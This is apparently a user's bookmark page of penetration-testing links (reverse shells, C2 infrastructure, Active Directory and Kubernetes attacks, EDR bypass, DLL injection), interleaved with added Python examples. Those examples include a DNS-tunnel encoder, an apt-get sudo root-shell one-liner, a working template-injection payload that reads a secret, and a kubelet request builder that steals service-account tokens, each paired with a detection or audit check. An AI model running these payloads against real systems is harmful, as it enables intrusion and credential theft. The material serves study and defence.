
whip_lash : pentest   538

GitHub - proxycannon/proxycannon-ng: A private botnet using multiple cloud environments for pentesters and red teamers. - Built by the community during a hackathon at the WWHF 2018 security conference
We've created an on-demand proxy tool that leverages cloud environments, giving a user the ability to source (all) your traffic from an endless supply of cloud-based IP addresses. Think of it as your own private TOR network for your red team and pentest engagements.
proxy  pentest  cloud 
21 hours ago by whip_lash
GitHub - sysdream/chashell
Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.
dns  shell  reverseshell  pentest 
21 hours ago by whip_lash
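Added example, not chashell's code: a minimal illustration of how a DNS-carried shell packs data into query names, and the check a defender would run against resolver logs to spot it. The zone `c2.example.net`, the `s<n>` sequence-label framing and the sample shell output are assumptions made for this illustration; chashell's own framing, encryption and chunk sizes are not reproduced.

```python
import base64
import math
from collections import Counter

# Constructed parameters for this illustration; chashell's real framing,
# encryption and chunk sizes are not reproduced here.
C2_DOMAIN = "c2.example.net"   # assumed attacker-controlled zone
MAX_LABEL = 63                 # RFC 1035 label limit
MAX_NAME = 253                 # RFC 1035 limit on a name in text form
SEQ_BUDGET = 9                 # room for an "s<n>" sequence label plus its dot


def encode_chunks(payload, domain=C2_DOMAIN):
    """Pack payload bytes into a list of DNS names that fit RFC 1035 limits.

    base32 is used because DNS names are case-insensitive, so base64 would be
    corrupted by resolvers that fold case.  A leading "s<n>" label lets the
    receiver reorder queries that arrive out of order or get retried.
    """
    b32 = base64.b32encode(payload).decode().rstrip("=").lower()
    budget = MAX_NAME - len(domain) - 1 - SEQ_BUDGET
    labels_per_name = budget // (MAX_LABEL + 1)
    data_per_name = labels_per_name * MAX_LABEL
    names = []
    for seq, i in enumerate(range(0, len(b32), data_per_name)):
        chunk = b32[i:i + data_per_name]
        labels = [chunk[j:j + MAX_LABEL] for j in range(0, len(chunk), MAX_LABEL)]
        names.append(".".join(["s%d" % seq, *labels, domain]))
    return names


def decode_chunks(names, domain=C2_DOMAIN):
    """Reassemble the payload from the names, tolerating any arrival order."""
    suffix = "." + domain
    parts = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        parts[int(labels[0][1:])] = "".join(labels[1:])
    b32 = "".join(parts[k] for k in sorted(parts)).upper()
    b32 += "=" * (-len(b32) % 8)      # restore the padding stripped on send
    return base64.b32decode(b32)


def looks_like_tunnel(name, zone_labels=2, min_len=50, min_entropy=3.0):
    """Cheap defender-side heuristic: lots of high-entropy subdomain data.

    Real traffic analysis would also look at query rate per zone, TXT/NULL
    record use and the ratio of unique names; this is only the name check.
    """
    labels = name.rstrip(".").split(".")
    data = "".join(labels[:-zone_labels])
    if len(data) < min_len:
        return False
    counts = Counter(data)
    entropy = -sum((c / len(data)) * math.log2(c / len(data)) for c in counts.values())
    return entropy >= min_entropy


# Constructed sample payload: the kind of output a reverse shell would return.
SAMPLE_OUTPUT = b"uid=0(root) gid=0(root) groups=0(root)\n" * 6

if __name__ == "__main__":
    queries = encode_chunks(SAMPLE_OUTPUT)
    for q in queries:
        print(len(q), q)
    assert decode_chunks(reversed(queries)) == SAMPLE_OUTPUT
    print(looks_like_tunnel(queries[0]), looks_like_tunnel("www.example.com"))
```

Each name stays inside the RFC 1035 limits (63 bytes per label, 253 for the whole name), which is why a couple of hundred bytes of output already needs two queries. That volume of long, high-entropy names to a single zone is what `looks_like_tunnel`, and any resolver or proxy logging, should key on; it is also why tightly restricted networks that still let arbitrary recursive DNS out are not as tight as they look.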
Run any app from Ease of Access button on Windows 10 login screen
To open Command Prompt using the Ease of Access button from the Windows 10 login screen, set the Debugger value data to the following value
windows  pentest  debug  registry 
3 days ago by whip_lash
impacket/wmiexec.py at master · SecureAuthCorp/impacket · GitHub
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
# in the event log that smbexec.py does when creating a service.
wmi  psexec  pentest 
3 days ago by whip_lash
GitHub - FortyNorthSecurity/WMImplant: This is a PowerShell based tool that is designed to act like a RAT. Its interface is that of a shell where any command that is supported is translated into a WMI-equivalent for use on a network/remote machine. WMImpl
This is a PowerShell based tool that is designed to act like a RAT. Its interface is that of a shell where any command that is supported is translated into a WMI-equivalent for use on a network/remote machine. WMImplant is WMI based.
wmi  c2  windows  pentest 
3 days ago by whip_lash
Hybrid Cobalt Strike Redirectors · Zach Grace
Working for an organization with a strict data security policy puts a few challenges on a Red Team, especially when it comes to building robust infrastructure. m0ther_ and I set out to build a robust, multi-redirector infrastructure similar to what Raphael Mudge described in his blog post, Cloud-based Redirectors for Distributed Hacking, except we wanted to host the team server on-prem. The post below describes two iterations of infrastructure we built to meet our needs.
cobaltstrike  c2  pentest 
7 days ago by whip_lash
GitHub - secabstraction/PowerCat: A PowerShell TCP/IP swiss army knife.
Favorite tweet:

PowerCat : A PowerShell TCP/IP swiss army knife : https://t.co/xIrOZmZxER

— Binni Shah (@binitamshah) February 9, 2019
cli  netcat  powershell  windows  pentest 
8 days ago by whip_lash
Introducing Armory: External Pentesting Like a Boss
We are introducing Armory, a tool that adds a database backend to dozens of popular external and discovery tools. This allows you to run the tools directly from Armory, automatically ingest the results back into the database and use the new data to supply targets for other tools.  
pentest  tools 
12 days ago by whip_lash
Abusing Exchange: One API call away from Domain Admin - dirkjanm.io
In most organisations using Active Directory and Exchange, Exchange servers have such high privileges that being an Administrator on an Exchange server is enough to escalate to Domain Admin. Recently I came across a blog from the ZDI, in which they detail a way to let Exchange authenticate to attackers using NTLM over HTTP. This can be combined with an NTLM relay attack to escalate from any user with a mailbox to Domain Admin in probably 90% of the organisations I’ve seen that use Ex...
exchange  windows  security  pentest  activedirectory 
12 days ago by whip_lash
GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit tools
The default Active Directory ms-DS-MachineAccountQuota attribute setting allows all domain users to add up to 10 machine accounts to a domain. Powermad includes a set of functions for exploiting ms-DS-MachineAccountQuota without attaching an actual system to AD.
dns  exploit  pentest  powershell  activedirectory 
12 days ago by whip_lash
XXE that can Bypass WAF Protection – Wallarm
Unfortunately, bypasses exist for the WAFs of both categories.

Below we show several methods the bad guys can use to fool a WAF and get XXE through.
xxe  waf  webapp  pentest 
17 days ago by whip_lash
Webinar #1 | GoToStage.com
Learn the basics of post-exploitation from advanced infosec professionals

Join Carlos Perez (@darkoperator) as he shares some of the post-exploitation methodology used by TrustedSec security consultants performed during actual attack simulations. Each of the four individual webinars will focus on specific aspects that will build upon each other to give a complete picture of the post-exploitation process. New tools will also be released during each individual webinar.
pentest  postexploitation  video 
18 days ago by whip_lash
Pentesting Cheatsheets - Red Teaming Experiments
Convenient commands for your pentesting / red-teaming engagements, OSCP and CTFs.
pentest  cheatsheets 
19 days ago by whip_lash
Sh00T - A Testing Environment for Manual Security Testers - KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
Sh00t:
• is a task manager to let you focus on performing security testing
• provides To Do checklists of test cases
• helps to create bug reports with customizable bug templates
pentest  security  tool  notes 
19 days ago by whip_lash
GitHub - TBGSecurity/splunk_shells: Weaponizing Splunk with reverse and bind shells.
This app is to help with penetration testing and Red Teaming within environments that have a Splunk deployment.

This app will allow the engineer to spawn a Reverse or Bind Shell from a Splunk server to allow the engineer to interact with the server and expand influence within the environment.
splunk  pentest 
25 days ago by whip_lash
Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration – Logan S Diomedi – lsdsecurity
There are many well known and documented attack vectors for the sudo command that exist. Please see my Useful Resources page for the Windows & Linux Privilege Escalation piece that contains a ton of helpful knowledge in this category. Today, we’re going to be using a very poorly documented feature in apt-get when a normal user is allowed to execute apt-get as a root user. Let’s dive in!
linux  privesc  privilegeescalation  sudo  pentest  security 
29 days ago by whip_lash
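Added example, not from the post: the check a defender (or a pentester who has just landed a shell) runs to find out whether the apt-get trick even matters. It parses a sudoers file and flags passwordless rules for binaries that can hand back a root shell, apt-get among them (for instance `sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh`, a documented abuse of apt's hook options). The sample sudoers excerpt and the `SHELL_CAPABLE` list are constructed for the example and the list is not exhaustive.

```python
import re

# Binaries that hand back a root shell or run arbitrary commands when allowed
# under sudo: apt-get/apt/dpkg from the post (apt's APT::Update::Pre-Invoke
# hook, or the pager spawned by "apt-get changelog"), plus a few documented peers.
# Constructed, not exhaustive.
SHELL_CAPABLE = {
    "apt-get", "apt", "dpkg", "vi", "vim", "less", "more", "man", "find",
    "awk", "python", "python3", "perl", "env", "bash", "sh",
}

# One user specification in sudoers:
#   who  HOST=(RUNAS) [TAG:[TAG:]] cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG_RE = re.compile(r"^([A-Z]+):\s*")
SKIP_KEYWORDS = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text):
    """Parse user specifications; Defaults, alias and #include lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.split()[0] in SKIP_KEYWORDS:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rest, tags = m.group("rest"), set()
        while True:                      # peel off NOPASSWD:, SETENV:, ...
            t = TAG_RE.match(rest)
            if not t:
                break
            tags.add(t.group(1))
            rest = rest[t.end():]
        rules.append({
            "who": m.group("who"),
            "host": m.group("host"),
            "runas": m.group("runas") or "root",
            "tags": tags,
            "cmds": [c.strip() for c in rest.split(",") if c.strip()],
        })
    return rules


def find_risky(rules):
    """Return (who, command) pairs that give a passwordless path to root."""
    findings = []
    for r in rules:
        if "NOPASSWD" not in r["tags"]:
            continue
        for cmd in r["cmds"]:
            if cmd == "ALL":
                findings.append((r["who"], cmd))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_CAPABLE:
                findings.append((r["who"], cmd))
    return findings


# Constructed /etc/sudoers excerpt: the %sudo and backup lines are the kind of
# misconfiguration the post abuses, the deploy line is a narrow, acceptable rule.
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL) NOPASSWD: /usr/bin/apt-get, /usr/bin/dpkg
deploy  ALL=(root) NOPASSWD: /bin/systemctl restart app.service   # narrow, no shell
backup  ALL=(ALL) NOPASSWD: ALL
"""

if __name__ == "__main__":
    for who, cmd in find_risky(parse_sudoers(SAMPLE_SUDOERS)):
        print("%s: NOPASSWD %s -> root shell reachable" % (who, cmd))
```

The point of the check is that the binary name is what matters, not the path: a rule that looks like routine package maintenance is a full root shell once the binary can run hooks, pagers or editors. Restricting to specific subcommands in sudoers does not help here either, because `-o` options are accepted on most apt-get invocations.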
us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely
embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is
extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to
directly attack web servers' internals and often obtain Remote Code Execution (RCE), turning every vulnerable
application into a potential pivot point.
templateinjection  webapp  pentest 
4 weeks ago by whip_lash
owasp_SSTI_final
Occurs when invalid user input is embedded into the template engine
• Often XSS attack occurs but SSTI can be missed
• Can lead to a remote code execution (RCE)
• Developer error or intentional exposure
templateinjection  webapp  pentest 
4 weeks ago by whip_lash
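Added example to make the point of the Kettle paper and the OWASP slides concrete, using Python's `str.format` as the template mechanism (this is not code from either source). Concatenating user input into the format string lets `{...}` field expressions walk object attributes all the way to module globals, which is the "attack the server's internals" step that makes SSTI worse than XSS; the fixed-template version passes the same input as data. `SECRET_KEY`, `User`, the probe and the payload are constructed for the illustration.

```python
# Constructed secret living in the module's globals, standing in for a
# framework config value an attacker would want (not a real key).
SECRET_KEY = "example-secret-0000"


class User:
    def __init__(self, name):
        self.name = name


def render_vulnerable(user_input, user):
    """Anti-pattern: untrusted text is concatenated INTO the template.

    str.format then interprets any {...} in the attacker's text as field
    lookups against the objects passed in, so attribute and item access
    ('.__class__', '[key]') become an arbitrary read primitive.
    """
    return ("Hello, " + user_input).format(user=user)


def render_safe(user_input, user):
    """Fix: the template is a constant; untrusted text is passed as data."""
    return "Hello, {name}: {text}".format(name=user.name, text=user_input)


# The str.format analogue of the {{7*7}} probe from the paper: if the marker
# is evaluated rather than echoed, the input is reaching the template engine.
PROBE = "{user.name}"
# Walk from the object to its class, to __init__, to the defining module's
# globals, and read the secret out of that dict.
PAYLOAD = "{user.__class__.__init__.__globals__[SECRET_KEY]}"


def is_injectable(renderer, user):
    out = renderer(PROBE, user)
    return PROBE not in out and user.name in out


if __name__ == "__main__":
    alice = User("alice")
    print(is_injectable(render_vulnerable, alice))   # True
    print(render_vulnerable(PAYLOAD, alice))        # Hello, example-secret-0000
    print(is_injectable(render_safe, alice))        # False
    print(render_safe(PAYLOAD, alice))              # payload echoed verbatim
```

Note why this is so easy to misclassify as XSS: the vulnerable output for an ordinary HTML payload looks exactly like reflected XSS, and only the probe shows the string is being interpreted server-side. Other engines (Jinja2, Twig, FreeMarker, Smarty) give the same read primitive with different syntax, and several of them also expose a route to code execution, which is the paper's RCE argument.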
PRETty - "PRinter Exploitation Toolkit" LAN Automation Tool - KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
PRETty is useful when a large number of printers are present on a network. Instead of scanning, logging, and manually running PRET against each individual printer, PRETty will automatically discover and run chosen PRET payloads against all printers on the target network. Additionally, PRETty can be used to automate command/payload delivery to any given list of printers (See the "Lists" section)
printer  pentest 
4 weeks ago by whip_lash
www.agarri.fr
Favorite tweet:

If you like this kind of @Burp_Suite tips, here's ~100 pages of them. That was published in 2013 but most of it is still valid. https://t.co/2UNQEtQZHV https://t.co/j1LUyEo0lD

— Nicolas Grégoire (@Agarri_FR) January 16, 2019
burp  proxy  pentest 
4 weeks ago by whip_lash
Kubernetes: unauth kubelet API 10250 token theft & kubectl - Carnal0wnage & Attack Research Blog
do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your post request to exec within a pod so we can poke around.
kubernetes  pentest  security  vulnerability 
4 weeks ago by whip_lash
Kubernetes: unauth kubelet API 10250 basic code exec - Carnal0wnage & Attack Research Blog
Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.


Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.
kubernetes  security  pentest  vulnerability 
4 weeks ago by whip_lash
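Added example tying the two Carnal0wnage kubelet posts above together (example code, not from the posts): parse the PodList that `GET /runningpods/` returns, build the `POST /run/<namespace>/<pod>/<container>` request that carries the command in the `cmd` form field, and audit the kubelet flags whose defaults make this possible. The PodList JSON and the two kubelet command lines are constructed for the example.

```python
import json
from urllib.parse import quote, urlencode

# Constructed sample of the PodList an unauthenticated GET /runningpods/
# returns (shape only; the pod and container names are made up).
SAMPLE_RUNNINGPODS = json.dumps({
    "kind": "PodList",
    "apiVersion": "v1",
    "items": [
        {"metadata": {"name": "web-7d9f", "namespace": "default"},
         "spec": {"containers": [{"name": "nginx"}, {"name": "sidecar"}]}},
        {"metadata": {"name": "kube-proxy-x1", "namespace": "kube-system"},
         "spec": {"containers": [{"name": "kube-proxy"}]}},
    ],
})


def exec_targets(runningpods_json):
    """Return every (namespace, pod, container) triple the kubelet is running."""
    doc = json.loads(runningpods_json)
    return [
        (pod["metadata"]["namespace"], pod["metadata"]["name"], c["name"])
        for pod in doc.get("items", [])
        for c in pod.get("spec", {}).get("containers", [])
    ]


def build_run_request(node, namespace, pod, container, cmd, port=10250):
    """Build the POST /run/<ns>/<pod>/<container> request the posts describe.

    Returns (url, form_body); the kubelet takes the command from the 'cmd'
    field and runs it in that container, returning stdout in the response.
    """
    url = "https://%s:%d/run/%s/%s/%s" % (
        node, port, quote(namespace, safe=""), quote(pod, safe=""), quote(container, safe=""))
    return url, urlencode({"cmd": cmd})


def audit_kubelet_flags(cmdline):
    """Flag the kubelet command-line settings that leave 10250 wide open.

    Defaults when a flag is absent: --anonymous-auth=true,
    --authorization-mode=AlwaysAllow, --read-only-port=10255.  A --config
    file (KubeletConfiguration) can override these, so check it too if present.
    """
    flags = {}
    for arg in cmdline.split():
        if arg.startswith("--"):
            key, _, value = arg.partition("=")
            flags[key] = value
    issues = []
    if flags.get("--anonymous-auth", "true") == "true":
        issues.append("anonymous requests to 10250 are accepted")
    if flags.get("--authorization-mode", "AlwaysAllow") == "AlwaysAllow":
        issues.append("authenticated requests are never authorized (AlwaysAllow)")
    ro_port = flags.get("--read-only-port", "10255")
    if ro_port != "0":
        issues.append("unauthenticated read-only port %s is enabled" % ro_port)
    return issues


# Constructed command lines: an exposed kubelet and a hardened one.
WEAK_KUBELET = "/usr/bin/kubelet --kubeconfig=/etc/kubernetes/kubelet.conf --anonymous-auth=true"
HARDENED_KUBELET = ("/usr/bin/kubelet --kubeconfig=/etc/kubernetes/kubelet.conf "
                    "--anonymous-auth=false --authorization-mode=Webhook --read-only-port=0 "
                    "--client-ca-file=/etc/kubernetes/pki/ca.crt")

if __name__ == "__main__":
    token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
    for ns, pod, c in exec_targets(SAMPLE_RUNNINGPODS):
        url, body = build_run_request("k8-node", ns, pod, c, "cat " + token_path)
        print(url, body)
    print(audit_kubelet_flags(WEAK_KUBELET))
    print(audit_kubelet_flags(HARDENED_KUBELET))
```

The token path in the usage block is why the first post is about token theft: every container carries its service account token at that location, and a `cat` through `/run/` hands it to the attacker, who then talks to the API server with `kubectl --token`. Closing the hole is the hardened command line, plus network policy that keeps 10250 off anything but the control plane.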
us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent Asynchronous-And-Fileless-Backdoor-wp.pdf
As technology is introduced and subsequently deprecated over time in the Windows operating system, one powerful technology that has remained consistent since Windows NT 4.0 and Windows 95 is Windows Management Instrumentation (WMI). Present on all Windows operating systems, WMI is comprised of a powerful set of tools used to manage Windows systems both locally and remotely.
powershell  wmi  pentest  postexploitation 
4 weeks ago by whip_lash
GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool
Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.
injection  template  pentest  webapp 
4 weeks ago by whip_lash
GitHub - Bashfuscator/Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
Favorite tweet:

Introducing Bashfuscator : A fully configurable and extendable Bash obfuscation framework : https://t.co/vOjDFzSQmF cc @capnspacehook

— Binni Shah (@binitamshah) January 14, 2019
bash  obfuscation  pentest 
4 weeks ago by whip_lash
Attacking Kubernetes through Kubelet
Favorite tweet:

Attacking Kubernetes through Kubelet : https://t.co/wMmGlTJZv6 pic.twitter.com/avPhhMNXMI

— Binni Shah (@binitamshah) January 14, 2019
kubernetes  pentest  vulnerability  security 
4 weeks ago by whip_lash
Bypassing Crowdstrike Falcon detection, from phishing email to reverse shell - Malware - 0x00sec - The Home of the Hacker
When I say bypassing, I mean completely bypass detection, from the phishing email received by the user to the reverse shell. Something realistic, not just writing a malware and see if it gets executed.

So if we can’t use the classic techniques, what about trying some new (old) trick?

Turns out, it was pretty trivial ¯\_(ツ)_/¯.
malware  pentest  antivirus 
4 weeks ago by whip_lash
Powershell Script for Enumerating Vulnerable DCOM Applications: DCOMrade
DCOMrade is a Powershell script that is able to enumerate the possibly vulnerable DCOM applications that might allow for lateral movement, code execution, data exfiltration, etc. The script is built to work with Powershell 2.0 but will work with all versions above as well.
dcom  windows  pentest  powershell  postexploitation  security 
5 weeks ago by whip_lash
Lateral Movement via DCOM: Round 2 | enigma0x3
This resulted in identifying the MMC20.Application COM object and its “ExecuteShellCommand” method, which you can read more about here. Thanks to the help of James Forshaw (@tiraniddo), we determined that the MMC20.Application object lacked explicit “LaunchPermissions”, resulting in the default permission set allowing Administrators access:
dcom  security  windows  postexploitation  pentest 
5 weeks ago by whip_lash
Dump LAPS password in clear text – Akijosberry
By Default all the Domain Admins have view access to ms-MCS-AdmPwd attribute. Let's have a look at the following ways in which we can dump the LAPS password
account  ad  directory  pentest  postexploitation 
5 weeks ago by whip_lash
GitHub - malcomvetter/DnsCache
This is a reference example for how to call the Windows API to enumerate cached DNS records in the Windows resolver. Proof of concept or pattern only.
github  dns  pentest  postexploitation 
6 weeks ago by whip_lash
flAWS2.cloud
flAWS 2 has two paths this time: Attacker and Defender! In the Attacker path, you'll exploit your way through misconfigurations in serverless (Lambda) and containers (ECS Fargate). In the Defender path, that target is now viewed as the victim and you'll work as an incident responder for that same app, understanding how an attack happened. You'll get access to logs of a previous successful attack. As a Defender you'll learn the power of jq in analyzing logs, and instructions on how to set up Athena in your own environment.
aws  security  pentest  pentesting  ctf  tutorial 
6 weeks ago by whip_lash
Laudanum download | SourceForge.net
Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found, and are in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others.
webapp  pentest  webshell 
8 weeks ago by whip_lash
A common path to Domain Admin - Laconic Wolf
Many common information gathering techniques and tools require you to be a part of the domain to use them (net users, etc.), so I decided to write a few IronPython scripts (located here) to do some basic enumeration tasks. I’m not going to get into the specifics of the code, but the first two scripts I wrote were a script to get a list of users and a script to guess passwords.
ironpython  bloodhound  activedirectory  privesc  privilegeescalation  pentest  pentesting 
8 weeks ago by whip_lash
Inside of Danderspritz post-exploitation modules – Wojciech – Medium
Most of the scripts are in “Ops” directory, inside “Windows” catalog which deserve additional attention, you can find full list here.

How to setup lab, run Fuzzbunch and Danderspritz here.

Everything was said about this framework, so I will focus only on post-exploitation modules. At the end of article, I will show how to write your own plugin, so bear with me.
postexploitation  nsa  danderspritz  pentest  tools 
8 weeks ago by whip_lash
SharpPack: The Insider Threat Toolkit – MDSec
Most of our favourite tools in the red team arsenal are developed in DotNet or PowerShell and there exists numerous ways to execute these from memory when operating from your implant such as CobaltStrike’s powerpick and execute-assembly methods. In our use case, we were operating without an implant but still wanted to reap the benefits of GhostPack, Internal Monologue et al and therefore we had to get a little more creative with our tradecraft. As previously noted, we were operating in an environment with tight application whitelisting so recompiling and obfuscating our chosen tools was just not an option. We did however observe two notable opportunities to get code execution as the environment made heavy use of VBScript (thanks Tanium :)) and locally created Office Macro enabled documents.
dotnet  malware  pentest  vbscript 
8 weeks ago by whip_lash
BMC Patrol Agent - Domain User to Domain Admin – Securifera
After verifying that we could use patrolcli to connect to any other patrol agent client using a regular domain user, we pointed it to the domain controller and were able to successfully execute commands as SYSTEM on the DC.
patrol  vulnerability  windows  pentest  privilegeescalation  domain  bmc 
8 weeks ago by whip_lash
Punk.Py - Unix SSH Post-Exploitation Tool - KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
punk.py is a post-exploitation tool meant to help network pivoting from a compromised unix box. It collects usernames, ssh keys and known hosts from a unix system, then it tries to connect via ssh to all the combinations found. punk.py is written in order to work on standard python2 and python3 installations.
ssh  postexploitation  pentest 
8 weeks ago by whip_lash
Windows C++ app hosts CLR 4 and invokes .NET assembly (CppHostCLR) sample in C#, C++ for Visual Studio 2010
The code sample uses the CLR 4 hosting APIs to host CLR in a native C++ project, load and invoke .NET assemblies
postexploitation  malware  pentest 
9 weeks ago by whip_lash
AppLocker CLM Bypass via COM – MDSec
I won’t cover the internals of this code here (I recommend you read through Microsoft’s post here if you are interested), but the end-result is that the DLL will load the .NET CLR, followed by a .NET assembly, and pass execution to the specified method.

With this completed, we now have access to .NET, and more importantly, .NET’s reflective capability. Next we need to figure out just where Constrained Language Mode’s on/off switch is.
applocker  postexploitation  windows  pentest 
9 weeks ago by whip_lash
Concealing Network Traffic via Google Translate | Running the Gauntlet
This translate proxying method is often used by the malware if their domain or IP is blocked. The malware uses either Google Translate, Bing Translator, or Yahoo! Babel Fish for this purpose. The malware sends HTTP GET requests using the following strings, where *URL* is the URL they wish to access
malware  pentest  proxy  google 
9 weeks ago by whip_lash
HTTP Proxy Authentication for Malware | Strategic Cyber LLC
The proxy username and password, when stored in the credential store, are available to any application that runs as the current user. If my target uses Internet Explorer and uses the Remember my credentials option to save retyping, then Meterpreter and Beacon get a free pass to authenticate and communicate through the configured proxy server—no code changes required. Better, these remembered credentials survive a reboot too.
proxy  pentest 
9 weeks ago by whip_lash
Research on CMSTP.exe – MSitPros Blog
Whenever I have a chance I use my time diving into Windows internal binaries to uncover hidden functionality. This blogpost is dedicated to things I have discovered with the CMSTP.exe binary file.
I found a UAC Bypass using sendkeys and a way to load DLL files from a Webdav server.
pentest  postexploitation  evasion  uac 
9 weeks ago by whip_lash
Anti-forensic and File-less Malware - Malware - 0x00sec - The Home of the Hacker
One of the most advantageous attributes for a malware to have is survival as a means to maintain persistence and to evade detection by security solutions. Since developing a full-blown piece of malware requires expensive resources, this trait becomes increasingly desirable to continuously remain unknown and undetected.
malware  pentest  tutorial 
9 weeks ago by whip_lash
GitHub - pwndizzle/c-sharp-memory-injection: A set of scripts that demonstrate how to perform memory injection in C#
A set of scripts that demonstrate how to perform memory injection.

I've tried to make these techniques as simple and opsec safe as possible, avoiding unnecessary memory modifications, process or file creation. I'm no C# expert or memory injection guru so use these examples at your own risk :)
c#  pentest  postexploitation 
9 weeks ago by whip_lash
subTee
In the example below I demonstrate the ability to load an arbitrary exe into csi.exe. This can be loaded from a basic text file. This is done on a PC running Windows Device Guard.
c#  windows  pentest  deviceguard 
9 weeks ago by whip_lash
From blind XXE to root-level file read access | Honoki
Below, I will outline the thought process that helped me make sense of what I encountered, and that in the end allowed me to elevate what seemed to be a medium-criticality vulnerability into a critical finding.

I will put deliberate emphasis on the various error messages that I encountered in the hope that it can point others in the right direction in the future.
java  security  xxe  pentest 
9 weeks ago by whip_lash
GitHub - stephenfewer/ReflectiveDLLInjection: Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.
Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.
malware  pentest 
9 weeks ago by whip_lash
Detecting reflective DLL loading with Windows Defender ATP - Microsoft Secure
A crucial aspect of reflectively loading a DLL is to have executable memory available for the DLL code. This can be accomplished by taking existing memory and changing its protection flags or by allocating new executable memory. Memory procured for DLL code is the primary signal we use to identify reflective DLL loading.

In Windows 10 Creators Update, we instrumented function calls related to procuring executable memory, namely VirtualAlloc and VirtualProtect, which generate signals for Windows Defender Advanced Threat Protection (Windows Defender ATP). Based on this instrumentation, we’ve built a model that detects reflective DLL loading in a broad range of high-risk processes, for example, browsers and productivity software.
malware  pentest 
9 weeks ago by whip_lash
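Added example (not Microsoft's detection, which is a trained model over this telemetry): a rule-based version of the signal the post describes, run over a constructed stream of VirtualAlloc / VirtualProtect / CreateThread events. The event dictionaries and the sample events are made up for this illustration and imply no Defender ATP schema. Expect JIT-heavy browsers to trip the RWX rule legitimately, which is precisely why the product scores the signal instead of alerting on every hit.

```python
# Processes the post singles out as high-risk hosts for reflective loading
# (browsers and productivity software).  svchost appears in the sample only
# as a benign control.
HIGH_RISK = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe",
             "chrome.exe", "firefox.exe", "iexplore.exe"}

EXECUTABLE = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ",
              "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}
WRITABLE = {"PAGE_READWRITE", "PAGE_WRITECOPY",
            "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}


def detect_reflective_load(events):
    """Correlate memory-API events per process and emit alerts.

    Three signals, in rising order of confidence:
      1. VirtualAlloc that is both writable and executable (RWX).
      2. VirtualProtect that flips a region we saw allocated writable to
         executable: the W->X pattern a PE loader produces after copying
         sections and applying relocations.
      3. A thread whose start address lies inside such private executable memory.
    Regions allocated before monitoring started cannot be judged and are skipped.
    """
    regions = {}   # (pid, base) -> {"size", "protect", "ever_writable"}
    alerts = []
    for e in events:
        if e["image"].lower() not in HIGH_RISK:
            continue
        pid, api = e["pid"], e["api"]
        if api == "VirtualAlloc":
            regions[(pid, e["base"])] = {
                "size": e["size"], "protect": e["protect"],
                "ever_writable": e["protect"] in WRITABLE}
            if e["protect"] in EXECUTABLE and e["protect"] in WRITABLE:
                alerts.append((pid, e["image"], "RWX allocation of 0x%x bytes" % e["size"]))
        elif api == "VirtualProtect":
            r = regions.get((pid, e["base"]))
            if r is None:
                continue
            if r["ever_writable"] and r["protect"] not in EXECUTABLE and e["protect"] in EXECUTABLE:
                alerts.append((pid, e["image"], "writable region at 0x%x made executable" % e["base"]))
            r["protect"] = e["protect"]
            r["ever_writable"] = r["ever_writable"] or e["protect"] in WRITABLE
        elif api == "CreateThread":
            for (rpid, base), r in regions.items():
                if rpid == pid and base <= e["start"] < base + r["size"] and r["protect"] in EXECUTABLE:
                    alerts.append((pid, e["image"],
                                   "thread started at 0x%x inside private executable memory" % e["start"]))
    return alerts


# Constructed event stream: a Word process stages a payload RW, flips it to RX
# and starts a thread in it; a service host does an ordinary RW allocation.
SAMPLE_EVENTS = [
    {"pid": 4242, "image": "WINWORD.EXE", "api": "VirtualAlloc",
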